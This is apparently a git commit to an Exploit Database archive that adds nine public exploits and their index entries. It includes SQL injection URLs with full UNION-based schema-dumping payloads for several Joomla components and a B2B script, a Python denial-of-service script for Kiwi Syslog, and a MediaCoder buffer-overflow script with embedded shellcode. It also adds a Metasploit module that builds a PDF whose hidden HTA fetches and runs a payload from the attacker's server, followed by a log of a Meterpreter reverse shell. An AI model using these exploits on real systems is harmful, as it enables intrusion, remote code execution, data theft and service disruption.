DB: 2017-08-03

9 new exploits Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit) Entrepreneur B2B Script - 'pid' Parameter SQL Injection Joomla! Component SIMGenealogy 2.1.5 - SQL Injection Joomla! Component PHP-Bridge 1.2.3 - SQL Injection Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection
2017-08-03 05:01:30 +00:00 · 2017-08-03 05:01:30 +00:00 · a600aa05cd
commit a600aa05cd
parent baeaf13b13
10 changed files with 419 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -5635,6 +5635,7 @@ id,file,description,date,author,platform,type,port
 42399,platforms/linux/dos/42399.txt,"libvorbis 1.3.5 - Multiple Vulnerabilities",2017-07-31,qflb.wu,linux,dos,0
 42400,platforms/linux/dos/42400.txt,"libao 1.2.0 - Denial of Service",2017-07-31,qflb.wu,linux,dos,0
 42409,platforms/linux/dos/42409.txt,"libmad 0.15.1b - 'mp3' Memory Corruption",2017-08-01,qflb.wu,linux,dos,0
 42411,platforms/windows/dos/42411.py,"Solarwinds Kiwi Syslog 9.6.1.6 - Denial of Service",2017-08-01,"Guillaume Kaddouch",windows,dos,0
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
@ -9124,6 +9125,7 @@ id,file,description,date,author,platform,type,port
 41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0
 41959,platforms/windows/local/41959.txt,"Serviio PRO 1.8 DLNA Media Streaming Server - Local Privilege Escalation",2017-05-03,LiquidWorm,windows,local,0
 41972,platforms/windows/local/41972.txt,"Gemalto SmartDiag Diagnosis Tool < 2.5 - Buffer Overflow (SEH)",2017-05-08,"Majid Alqabandi",windows,local,0
 41971,platforms/windows/local/41971.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-05-08,Muhann4d,windows,local,0
 41973,platforms/linux/local/41973.txt,"Xen 64bit PV Guest - pagetable use-after-type-change Breakout",2017-05-08,"Google Security Research",linux,local,0
 41994,platforms/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",linux,local,0
 41995,platforms/linux/local/41995.c,"Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation",2017-03-22,"Andrey Konovalov",linux,local,0
@ -9166,6 +9168,7 @@ id,file,description,date,author,platform,type,port
 42384,platforms/windows/local/42384.py,"MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42385,platforms/windows/local/42385.py,"AudioCoder 0.8.46 - Local Buffer Overflow (SEH)",2017-07-26,Muhann4d,windows,local,0
 42407,platforms/multiple/local/42407.txt,"iOS/macOS - xpc_data Objects Sandbox Escape Privelege Escalation",2017-08-01,"Google Security Research",multiple,local,0
 42418,platforms/windows/local/42418.rb,"Nitro Pro PDF Reader 11.0.3.173 - Javascript API Remote Code Execution (Metasploit)",2017-08-02,Metasploit,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -38210,3 +38213,9 @@ id,file,description,date,author,platform,type,port
 42403,platforms/php/webapps/42403.txt,"VehicleWorkshop - Authentication Bypass",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42404,platforms/php/webapps/42404.txt,"VehicleWorkshop - Arbitrary File Upload",2017-08-01,"Touhid M.Shaikh",php,webapps,0
 42408,platforms/hardware/webapps/42408.txt,"SOL.Connect ISET-mpp meter 1.2.4.2 - SQL Injection",2017-08-01,"Andy Tan",hardware,webapps,0
 42412,platforms/php/webapps/42412.txt,"Entrepreneur B2B Script - 'pid' Parameter SQL Injection",2017-08-02,"Meisam Monsef",php,webapps,0
 42413,platforms/php/webapps/42413.txt,"Joomla! Component SIMGenealogy 2.1.5 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42414,platforms/php/webapps/42414.txt,"Joomla! Component PHP-Bridge 1.2.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42415,platforms/php/webapps/42415.txt,"Joomla! Component LMS King Professional 3.2.4.0 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42416,platforms/php/webapps/42416.txt,"Joomla! Component Event Registration Pro Calendar 4.1.3 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
 42417,platforms/php/webapps/42417.txt,"Joomla! Component Ultimate Property Listing 1.0.2 - SQL Injection",2017-08-02,"Ihsan Sencan",php,webapps,0
--- a/platforms/php/webapps/42412.txt
+++ b/platforms/php/webapps/42412.txt
@ -0,0 +1,11 @@
 # Exploit Title: Entrepreneur B2B Script - 'pid' Parameter SQL Injection
 # Date: 2017-08-02
 # Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com
 # Vendor Homepage: http://readymadeb2bscript.com/
 # Version: All Version
 Exploit :
 http://site.com/[path]/product_view1.php?pid=-99999+[SQL+Command]
--- a/platforms/php/webapps/42413.txt
+++ b/platforms/php/webapps/42413.txt
@ -0,0 +1,15 @@
 # # # # #
 # Exploit Title: Joomla! Component SIMGenealogy v2.1.5 - SQL Injection
 # Dork: N/A
 # Date: 02.08.2017
 # Vendor : https://www.simbunch.com/
 # Software: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/simgenealogy/
 # Demo: https://www.simbunch.com/demos/simgenealogy
 # Version: 2.1.5
 # # # # #
 # Author: Ihsan Sencan
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_simgenealogy&view=latest&type=[SQL]
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42414.txt
+++ b/platforms/php/webapps/42414.txt
@ -0,0 +1,16 @@
 # # # # #
 # Exploit Title: Joomla! Component PHP-Bridge v1.2.3 - SQL Injection
 # Dork: N/A
 # Date: 02.08.2017
 # Vendor : http://www.henryschorradt.de/
 # Software: https://extensions.joomla.org/extensions/extension/miscellaneous/development/php-bridge/
 # Demo: http://www.henryschorradt.de/joomla-php-bridge/
 # Version: 1.2.3
 # # # # #
 # Author: Ihsan Sencan
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_phpbridge&view=phpview&run=fahrzeuge&mode=detail&id=[SQL]
 # -00000090+union+select+1,(sELECT+eXPORT_sET(5,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(5,eXPORT_sET(5,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,2)),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29--+-
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42415.txt
+++ b/platforms/php/webapps/42415.txt
@ -0,0 +1,15 @@
 # # # # #
 # Exploit Title: Joomla! Component LMS King Professional v3.2.4.0 - SQL Injection
 # Dork: N/A
 # Date: 02.08.2017
 # Vendor : http://king-products.net/
 # Software: https://extensions.joomla.org/extensions/extension/living/education-a-culture/lms-king-professional-for-joomla/
 # Demo: http://demo.king-products.net/
 # Version: 3.2.4.0
 # # # # #
 # Author: Ihsan Sencan
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_lmsking&view=lmsking&layout=learningpath&task=learningPath&cp_id=[SQL]
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42416.txt
+++ b/platforms/php/webapps/42416.txt
@ -0,0 +1,16 @@
 # # # # #
 # Exploit Title: Joomla! Component Event Registration Pro Calendar v4.1.3 - SQL Injection
 # Dork: N/A
 # Date: 02.08.2017
 # Vendor : http://joomlashowroom.com/
 # Software: https://www.joomlashowroom.com/products/event-registration-pro-calendar
 # Demo: http://demo3.joomlashowroom.com/
 # Version: 4.1.3
 # # # # #
 # Author: Ihsan Sencan
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_registrationpro&view=category&id=[SQL]
 # -33++union+select++make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),2,3,4--+-
 # Etc..
 # # # # #
--- a/platforms/php/webapps/42417.txt
+++ b/platforms/php/webapps/42417.txt
@ -0,0 +1,18 @@
 # # # # #
 # Exploit Title: Joomla! Component Ultimate Property Listing v1.0.2 - SQL Injection
 # Dork: N/A
 # Date: 02.08.2017
 # Vendor : http://faboba.com/
 # Software: https://extensions.joomla.org/extensions/extension/vertical-markets/real-estate/ultimate-property-listing/
 # Demo: http://demoupl.faboba.com/
 # Version: 1.0.2
 # # # # #
 # Author: Ihsan Sencan
 # # # # #
 # SQL Injection/Exploit :
 # http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&sf_selectuser_id=[SQL]
 # -109'+UNION+ALL+SELECT+0x31,0x32,0x33,0x34,0x35,0x36,0x37,(sELECT+eXPORT_sET(0x35,@:=0,(sELECT+cOUNT(*)fROM(iNFORMATiON_sCHEMA.cOLUMNS)wHERE@:=eXPORT_sET(0x35,eXPORT_sET(0x35,@,tABLE_nAME,0x3c6c693e,2),cOLUMN_nAME,0xa3a,2)),@,0x32)),0x39,0x3130,0x3131,0x3132,0x3133,0x3134,0x3135,0x3136,0x3137,0x3138,0x3139,0x3230,0x3231,0x3232,0x3233,0x3234,0x3235,0x3236,0x3237,0x3238,0x3239,0x3330,0x3331,0x3332,0x3333,0x3334,0x3335,0x3336,0x3337,0x3338,0x3339,0x3430,0x3431,0x3432,0x3433,0x3434,0x3435,0x3436,0x3437,0x3438,0x3439,0x3530,0x3531,0x3532,0x3533,0x3534,0x3535,0x3536,0x3537,0x3538,0x3539,0x3630,0x3631,0x3632,0x3633,0x3634,0x3635,0x3636,0x3637,0x3638,0x3639,0x3730,0x3731,0x3732,0x3733,0x3734,0x3735,0x3736,0x3737,0x3738,0x3739,0x3830,0x3831,0x3832,0x3833,0x3834,0x3835,0x3836,0x3837--+-
 # http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelocation1_id=[SQL]
 # http://localhost/[PATH]/index.php?option=com_upl&view=propertylisting&type=listing&sf_multiplelisting=[SQL]
 # Etc..
 # # # # #
--- a/platforms/windows/dos/42411.py
+++ b/platforms/windows/dos/42411.py
@ -0,0 +1,55 @@
 # Exploit Title: Solarwinds Kiwi Syslog 9.6.1.6 - Remote Denial of Service (Type Mismatch)
 # Date: 26/05/2017
 # Exploit Author: Guillaume Kaddouch
 #   Twitter: @gkweb76
 #   Blog: https://networkfilter.blogspot.com
 #   GitHub: https://github.com/gkweb76/exploits
 # Vendor Homepage: http://www.solarwinds.com/
 # Software Link: http://downloads.solarwinds.com/solarwinds/Release/Kiwi/Syslog/Kiwi-Syslog-Server-9.6.1-Eval.zip
 # Version: 9.6.1.6
 # Tested on: Windows 7 SP1 Family x64 (FR) and Windows 8.1 Pro x64
 # Category: DoS
 """
 Disclosure Timeline:
 --------------------
 2017-05-20: Vulnerability discovered
 2017-05-26: Vendor contacted
 2017-05-31: Vendor answered (technical support)
 2017-05-31: Vendor contacted (no answer)
 2017-08-01: Exploit published
 Description :
 -------------
 A remote Denial of Service exists in Kiwi Syslog 9.6.1.6 in the TCP listener.
 Apparently any data sent to it make it crash because of a Type Mismatch error.
 The syslog TCP listener is disabled by default.
 Instructions:
 -------------
 - Starts Kiwi Syslog, and enable the TCP listener in the settings, default port is 1468.
 - Run this exploit locally or from your remote attacking machine.
 """
 #!/usr/bin/python
 import socket
 host    = "10.0.0.56"
 port    = 1468
 buffer  = "crash please?"
 try:
        print "[*] Connecting to %s:%d" % (host, port)
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        print "[*] Sending buffer... (%d bytes)" % len(buffer)
        s.send(buffer)
        s.close()
        print "[*] Done."
 except:
        print "[-] Error connecting"
--- a/platforms/windows/local/41971.py
+++ b/platforms/windows/local/41971.py
@ -0,0 +1,45 @@
 #!/usr/bin/python
 # Exploit Title     : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH)
 # Date              : 2017-05-08
 # Exploit Author    : Muhann4d
 # Vendor Homepage   : http://www.mediacoderhq.com
 # Software Link     : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe
 # Tested Version    : 0.8.48.5888
 # Category          : Local Buffer Overflow
 # Tested on OS      : Windows 7 Professional SP1 32bit
 print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d"
 from struct import pack
 junk = "http://" + "\x41" * 361
 nseh = pack('<I',0x909006eb)
 seh = pack('<I',0x66017187)
 nops= "\x90" * 20
 shell=("\xbe\xb6\x06\x32\x7a\xda\xd1\xd9\x74\x24\xf4\x5a\x29\xc9\xb1"
 "\x31\x31\x72\x13\x03\x72\x13\x83\xea\x4a\xe4\xc7\x86\x5a\x6b"
 "\x27\x77\x9a\x0c\xa1\x92\xab\x0c\xd5\xd7\x9b\xbc\x9d\xba\x17"
 "\x36\xf3\x2e\xac\x3a\xdc\x41\x05\xf0\x3a\x6f\x96\xa9\x7f\xee"
 "\x14\xb0\x53\xd0\x25\x7b\xa6\x11\x62\x66\x4b\x43\x3b\xec\xfe"
 "\x74\x48\xb8\xc2\xff\x02\x2c\x43\xe3\xd2\x4f\x62\xb2\x69\x16"
 "\xa4\x34\xbe\x22\xed\x2e\xa3\x0f\xa7\xc5\x17\xfb\x36\x0c\x66"
 "\x04\x94\x71\x47\xf7\xe4\xb6\x6f\xe8\x92\xce\x8c\x95\xa4\x14"
 "\xef\x41\x20\x8f\x57\x01\x92\x6b\x66\xc6\x45\xff\x64\xa3\x02"
 "\xa7\x68\x32\xc6\xd3\x94\xbf\xe9\x33\x1d\xfb\xcd\x97\x46\x5f"
 "\x6f\x81\x22\x0e\x90\xd1\x8d\xef\x34\x99\x23\xfb\x44\xc0\x29"
 "\xfa\xdb\x7e\x1f\xfc\xe3\x80\x0f\x95\xd2\x0b\xc0\xe2\xea\xd9"
 "\xa5\x13\x1a\xd0\x33\x83\x85\x81\x7e\xc9\x35\x7c\xbc\xf4\xb5"
 "\x75\x3c\x03\xa5\xff\x39\x4f\x61\x13\x33\xc0\x04\x13\xe0\xe1"
 "\x0c\x70\x67\x72\xcc\x59\x02\xf2\x77\xa6")
 junkD = "D" * (2960 - (len(junk + nseh + seh + nops + shell)))
 exploit = junk + nseh + seh + nops + shell + junkD
 try:
    file= open("Exploit.m3u",'w')
    file.write(exploit)
    file.close()
    raw_input("\nExploit has been created!\n")
 except:
    print "There has been an Error"
--- a/platforms/windows/local/42418.rb
+++ b/platforms/windows/local/42418.rb
@ -0,0 +1,219 @@
 ##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::FileDropper
  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE
  def initialize(info={})
    super(update_info(info,
      'Name'           => 'Nitro Pro PDF Reader 11.0.3.173 Javascript API Remote Code Execution',
      'Description'    => %q{
          This module exploits an unsafe Javascript API implemented in Nitro and Nitro Pro
          PDF Reader version 11. The saveAs() Javascript API function allows for writing
          arbitrary files to the file system. Additionally, the launchURL() function allows
          an attacker to execute local files on the file system and bypass the security dialog
          Note: This is 100% reliable.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
      [
        'mr_me <steven[at]srcincite.io>',         # vulnerability discovery and exploit
        'Brendan Coles <bcoles [at] gmail.com>',  # hidden hta tricks!
        'sinn3r'                                  # help with msf foo!
      ],
      'References'     =>
        [
          [ 'CVE', '2017-7442' ],
          [ 'URL', 'http://srcincite.io/advisories/src-2017-0005/' ],           # public advisory #1
          [ 'URL', 'https://blogs.securiteam.com/index.php/archives/3251' ],    # public advisory #2 (verified and acquired by SSD)
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # truly universal
          [ 'Automatic', { } ],
        ],
      'DisclosureDate' => 'Jul 24 2017',
      'DefaultTarget'  => 0))
      register_options([
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
        OptString.new('URIPATH', [ true, "The URI to use.", "/" ]),
      ])
      deregister_options('SSL', 'SSLVersion', 'SSLCert')
  end
  def build_vbs(url, stager_name)
    name_xmlhttp  = rand_text_alpha(2)
    name_adodb    = rand_text_alpha(2)
    vbs           = %Q|<head><hta:application
    applicationname="#{@payload_name}"
    border="none"
    borderstyle="normal"
    caption="false"
    contextmenu="false"
    icon="%SystemRoot%/Installer/{7E1360F1-8915-419A-B939-900B26F057F0}/Professional.ico"
    maximizebutton="false"
    minimizebutton="false"
    navigable="false"
    scroll="false"
    selection="false"
    showintaskbar="No"
    sysmenu="false"
    version="1.0"
    windowstate="Minimize"></head>
    <style>* { visibility: hidden; }</style>
    <script language="VBScript">
    window.resizeTo 1,1
    window.moveTo -2000,-2000
    </script>
    <script type="text/javascript">setTimeout("window.close()", 5000);</script>
    <script language="VBScript">
    On Error Resume Next
    Set #{name_xmlhttp} = CreateObject("Microsoft.XMLHTTP")
    #{name_xmlhttp}.open "GET","http://#{url}",False
    #{name_xmlhttp}.send
    Set #{name_adodb} = CreateObject("ADODB.Stream")
    #{name_adodb}.Open
    #{name_adodb}.Type=1
    #{name_adodb}.Write #{name_xmlhttp}.responseBody
    #{name_adodb}.SaveToFile "C:#{@temp_folder}/#{@payload_name}.exe",2
    set shellobj = CreateObject("wscript.shell")
    shellobj.Run "C:#{@temp_folder}/#{@payload_name}.exe",0
    </script>|
    vbs.gsub!(/    /,'')
    return vbs
  end
  def on_request_uri(cli, request)
    if request.uri =~ /\.exe/
      print_status("Sending second stage payload")
      return if ((p=regenerate_payload(cli)) == nil)
      data = generate_payload_exe( {:code=>p.encoded} )
      send_response(cli, data, {'Content-Type' => 'application/octet-stream'} )
      return
    end
  end
  def exploit
    # In order to save binary data to the file system the payload is written to a .vbs
    # file and execute it from there.
    @payload_name = rand_text_alpha(4)
    @temp_folder  = "/Windows/Temp"
    register_file_for_cleanup("C:#{@temp_folder}/#{@payload_name}.hta")
    if datastore['SRVHOST'] == '0.0.0.0'
      lhost = Rex::Socket.source_address('50.50.50.50')
    else
      lhost = datastore['SRVHOST']
    end
    payload_src  = lhost
    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
    stager_name = rand_text_alpha(6) + ".vbs"
    pdf = %Q|%PDF-1.7
    4 0 obj
    <<
    /Length 0
    >>
    stream
    |
    pdf << build_vbs(payload_src, stager_name)
    pdf << %Q|
    endstream endobj
    5 0 obj
    <<
    /Type /Page
    /Parent 2 0 R
    /Contents 4 0 R
    >>
    endobj
    1 0 obj
    <<
    /Type /Catalog
    /Pages 2 0 R
    /OpenAction [ 5 0 R /Fit ]
      /Names <<
        /JavaScript <<
          /Names [ (EmbeddedJS)
            <<
              /S /JavaScript
              /JS (
                    this.saveAs('../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
                    app.launchURL('c$:/../../../../../../../../../../../../../../../..#{@temp_folder}/#{@payload_name}.hta');
              )
            >>
          ]
        >>
      >>
    >>
    endobj
    2 0 obj
    <</Type/Pages/Count 1/Kids [ 5 0 R ]>>
    endobj
    3 0 obj
    <<>>
    endobj
    xref
    0 6
    0000000000 65535 f
    0000000166 00000 n
    0000000244 00000 n
    0000000305 00000 n
    0000000009 00000 n
    0000000058 00000 n
    trailer <<
    /Size 6
    /Root 1 0 R
    >>
    startxref
    327
    %%EOF|
    pdf.gsub!(/    /,'')
    file_create(pdf)
    super
  end
 end
 =begin
 saturn:metasploit-framework mr_me$ ./msfconsole -qr scripts/nitro.rc
 [*] Processing scripts/nitro.rc for ERB directives.
 resource (scripts/nitro.rc)> use exploit/windows/fileformat/nitro_reader_jsapi
 resource (scripts/nitro.rc)> set payload windows/meterpreter/reverse_tcp
 payload => windows/meterpreter/reverse_tcp
 resource (scripts/nitro.rc)> set LHOST 172.16.175.1
 LHOST => 172.16.175.1
 resource (scripts/nitro.rc)> exploit
 [*] Exploit running as background job.
 [*] Started reverse TCP handler on 172.16.175.1:4444 
 msf exploit(nitro_reader_jsapi) > [+] msf.pdf stored at /Users/mr_me/.msf4/local/msf.pdf
 [*] Using URL: http://0.0.0.0:8080/
 [*] Local IP: http://192.168.100.4:8080/
 [*] Server started.
 [*] 192.168.100.4    nitro_reader_jsapi - Sending second stage payload
 [*] Sending stage (957487 bytes) to 172.16.175.232
 [*] Meterpreter session 1 opened (172.16.175.1:4444 -> 172.16.175.232:49180) at 2017-04-05 14:01:33 -0500
 [+] Deleted C:/Windows/Temp/UOIr.hta
 msf exploit(nitro_reader_jsapi) > sessions -i 1
 [*] Starting interaction with 1...
 meterpreter > shell
 Process 2412 created.
 Channel 2 created.
 Microsoft Windows [Version 6.1.7601]
 Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
 C:\Users\researcher\Desktop>
 =end